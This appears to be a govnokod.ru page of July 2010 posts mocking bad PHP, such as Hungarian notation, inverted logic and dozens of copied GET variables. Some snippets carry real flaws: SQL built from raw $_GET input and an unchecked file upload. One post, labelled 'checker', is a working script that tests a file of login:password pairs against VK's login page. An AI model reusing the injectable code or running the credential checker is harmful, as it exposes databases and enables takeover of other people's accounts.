Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+162
if(!$_GET['q']) die(header("HTTP/1.0 404 Not Found"));
$_GET['q'] = str_replace('sec/',false,$_GET['q']);
$_GET['q'] = str_replace('/files/',false,$_GET['q']);
pg_query('INSERT INTO download (date,file,ip) VALUES ('NOW()','" . $_GET['q'] . "', '{$_SERVER['REMOTE_ADDR']}')');принятие запроса из GET и запись в базу
agent-0007,
07 Июля 2010
+158
<?php
// Подключаемься к базе данных
require_once ("bd.php");
$query = 'SELECT MAX(id) AS `id` FROM `data`';
$result = mysql_query($query) or die("Query failed : " . mysql_error());
/* Выводим результаты в html */
$line = mysql_fetch_array($result, MYSQL_ASSOC);
//================Настройки============= //
$fotos_dir = "fotos/"; // Директория для фотографий
$foto_name = $fotos_dir.time()."_".basename($_FILES['myfile']['name']); // Полное имя файла вместе с путем
$foto_light_name = $line['id']+1;
$foto_light_name2 = $foto_light_name.".".basename($_FILES['myfile']['type']);
//$foto_light_name = time()."_".basename($_FILES['myfile']['name']); // Имя файла исключая путь
// Текст ошибок
$error_by_mysql = "<span style=\"font: bold 15px tahoma; color: red;\">Ошибка при добавлении данных в базу</span>";
$error_by_file = "<span style=\"font: bold 15px tahoma; color: red;\">Невозможно загрузить файл в директорию. Возможно её не существует</span>";
// Начало
if(isset($_FILES["myfile"]))
{
$myfile = $_FILES["myfile"]["tmp_name"];
$myfile_name = $_FILES["myfile"]["name"];
$myfile_size = $_FILES["myfile"]["size"];
$myfile_type = $_FILES["myfile"]["type"];
$error_flag = $_FILES["myfile"]["error"];
// Если ошибок не было
if($error_flag == 0)
{
$DOCUMENT_ROOT = $_SERVER['DOCMENT_ROOT'];
$upfile = getcwd()."\\fotos\\" ."site.ru_".$foto_light_name2;
if ($_FILES['myfile']['tmp_name'])
{
//Если не удалось загрузить файл
if (!move_uploaded_file($_FILES['myfile']['tmp_name'], $upfile))
{
echo "$error_by_file";
exit;
}
}
else
{
echo 'Проблема: возможна атака через загрузку файла. ';
echo $_FILES['myfile']['name'];
exit;
}
// После удачной обработки файла, выводим сообщение
echo "<h3>Результат добавления обоины:</h3> <br />";
echo "Файл <b>".$foto_light_name2."</b> успешно добавлен<br />";
// Заносим путь картинки в базу данных
$q = "INSERT INTO data (foto,dir) VALUES ('$foto_light_name2','$fotos_dir')";
$query = mysql_query($q);
// Данные успешно внесены в базу данных, выводим сообщение
if ($query == 'true') {
echo "<br /><b>Данные успешно внесены в базу</b>";
}
// В противном случае, выводим ошибку при добавлении в базу данных
else {
echo "$error_by_mysql";
}
}
elseif ($myfile_size == 0) {
echo "Пустая форма!";
}
}
?>
оригинал http://forum.searchengines.ru/showpost.php?p=7226101&postcount=1 не шедевр, но говнокод присутствует.
$DOCUMENT_ROOT = $_SERVER['DOCMENT_ROOT']; - это так логично ...
GoodTalkBot,
07 Июля 2010
+111
if (!empty($_POST['fupload'])) //проверяем, отправил ли пользователь изображение
{
$fupload=$_POST['fupload']; $fupload = trim($fupload);
if ($fupload =='' or empty($fupload)) {
unset($fupload);// если переменная $fupload пуста, то удаляем ее
}
}Кусочек из видео уроков Попова
Vasiliy,
06 Июля 2010
+131
$user_name=$_POST['user_name'];
$query = mysql_query("SElECT login FROM user") or die(mysql_error());
$existing_users = mysql_fetch_array($query);
if (in_array($user_name, $existing_users))
{
echo "no";
}
else
{
echo "yes";
}Проверка зареган ли такой пользователь
Vasiliy,
06 Июля 2010
+148
$isOccupy=($valdet['isOccupy']=='1')?0:1;а все по тому что кое кто перепутал логику атрибута=\
nur,
06 Июля 2010
+171
if(@$send_to_order and @$mail and @$name_person and @$tel_name and @$adr_name) {
/** тут еще много подобного интересного кода **/
}PHPShop. отсылка письма после осуществления заказа
Under,
05 Июля 2010
+149
<?
$txt_file=("logins.txt");
preg_match( "/value='(.*)'/", file_get_contents("http://login.vk.com/?act=login&[email protected]&pass=asdasd&expire=&vk="), $null );
foreach(file($txt_file) as $account)
{
$data=explode(':',$account);
$qwe = file_get_contents('http://login.vk.com/?act=login&email='.urlencode($data[0]).'&pass='.urlencode($data[1]).'&expire=&vk=');
if($qwe == $null){
print "".$data[0].":".$data[1]." not valid</br>";
}else{
print "".$data[0].":".$data[1]." are valid</br>";
}
}
?>checker
r00t,
05 Июля 2010
+176
//вторая форма
$n2 = $_GET['n2'];//Компания
$n10 = $_GET['n10'];//Ф.И.О:
$n11 = $_GET['n11'];// Должность:
$n12 = $_GET['n12'];//Телефон:
$n13 = $_GET['n13'];//E-mail:
$n14 = $_GET['n14'];//
$n15 = $_GET['n15'];
$n16 = $_GET['n16'];
$n17 = $_GET['n17'];
$n18 = $_GET['n18'];
$n19 = $_GET['n19'];
$n20 = $_GET['n20'];
$n21 = $_GET['n21'];
$n22 = $_GET['n22'];
$n23 = $_GET['n23'];
$n24 = $_GET['n24'];
$n25 = $_GET['n25'];
$n26 = $_GET['n26'];
$n27 = $_GET['n27'];
$n28 = $_GET['n28'];
$n29 = $_GET['n29'];
$n30 = $_GET['n30'];
$n31 = $_GET['n31'];
$n32 = $_GET['n32'];
$n33 = $_GET['n33'];
$n34 = $_GET['n34'];
$n35 = $_GET['n35'];
$n37 = $_GET['n37'];//value - другое:
$n38 = $_GET['n38'];
$n39 = $_GET['n39'];
$n40 = $_GET['n40'];//new form - Картонные карты - Тираж(от 10 000 шт.):
$n41 = $_GET['n41'];
$n42 = $_GET['n42'];
$n43 = $_GET['n43'];
$n44 = $_GET['n44'];
$n45 = $_GET['n45'];
$n46 = $_GET['n46'];
$n47 = $_GET['n47'];//new form - Услуги сборки - Количество комплектов:
$n48 = $_GET['n48'];
$n49 = $_GET['n49'];
$n50 = $_GET['n50'];
$n51 = $_GET['n51'];
$n52 = $_GET['n52'];
$n53 = $_GET['n53'];
$n54 = $_GET['n54'];
$n55 = $_GET['n55'];
$n56 = $_GET['n56'];
$n57 = $_GET['n57'];
$n58 = $_GET['n58'];
$n59 = $_GET['n59'];//new form - Мейлинг - Есть
$n60 = $_GET['n60'];
$n61 = $_GET['n61'];
$n62 = $_GET['n62'];
$n63 = $_GET['n63'];
$n64 = $_GET['n64'];
$n65 = $_GET['n65'];
$n66 = $_GET['n66'];
$n67 = $_GET['n67'];
$n68 = $_GET['n68'];
$n69 = $_GET['n69'];
$n70 = $_GET['n70'];
$n71 = $_GET['n71'];
$n72 = $_GET['n72'];
$n73 = $_GET['n73'];
$n74 = $_GET['n74'];
$n75 = $_GET['n75'];
$n76 = $_GET['n76'];
$n77 = $_GET['n77'];
$n78 = $_GET['n78'];
$n79 = $_GET['n79'];
$n80 = $_GET['n80'];
$n81 = $_GET['n81'];
$n82 = $_GET['n82'];
$n83 = $_GET['n83'];
$n84 = $_GET['n84'];
$n85 = $_GET['n85'];
$n86 = $_GET['n86'];
$n87 = $_GET['n87'];
$n88 = $_GET['n88'];
$n89 = $_GET['n89'];
$n90 = $_GET['n90'];
$subject2 = "Онлайн просчет";
$headers2 = "MIME-Version: 1.0\n";
$headers2 .= "Content-type: text/html; charset=utf-8\n";
$text2 = "<table border='0' cellspacing='0' cellpadding='0' width='100%' align='center' bgcolor='#f0f0f0'> <tr>
<td><table border='0' cellspacing='0' cellpadding='0' width='600' align='center' bgcolor='#f0f0f0'> <tr>
<td width='178' height='50' valign='center'><font size='2'> Компания* :</font></td> <td
width='329'><input type=TEXT name='n2' value='".$n2."' readonly='readonly' size='49' style='border: 2;
background: #e2e2e2' /></td> </tr> <tr> <td height='50' valign='center'><font
этот пиздец был найден в коде одного проекта на жумле, в файле темплейта
в конечном итогде это все отправлялось на мыло
krasnoukhov,
05 Июля 2010
+156
<?php
class Train {
private $strFrom;
private $strTo;
private $strName;
....................................
public function __construct($arrParameters) {
$objThis = $this;
$objThis->strFrom = $arrParameters['strFrom'];
$objThis->strTo = $arrParameters['strTo'];
$objThis->strName = $arrParameters['strName'];
................................
$intCount = count($arrParameters);
for ($intI = 0; $intI < $intCount; $intI++) {
............................
}
................................
foreach ($arrParameters as $strKey => $mixedValue) {
............................
}
}
....................................
}Интересно ваше мнение о венгерской нотации
doroshenkoes,
05 Июля 2010
+160
if (empty($author) or empty ($text)) {
exit ("<p>Оппа, нежданчик!<br> <input name='back' type='button' value='Вернуться назад' onclick='javascript:self.back();'>");
}
...внезапно! (sic!)
Источник: комментарии на ruseller.com
kindofbear,
05 Июля 2010
Follow us!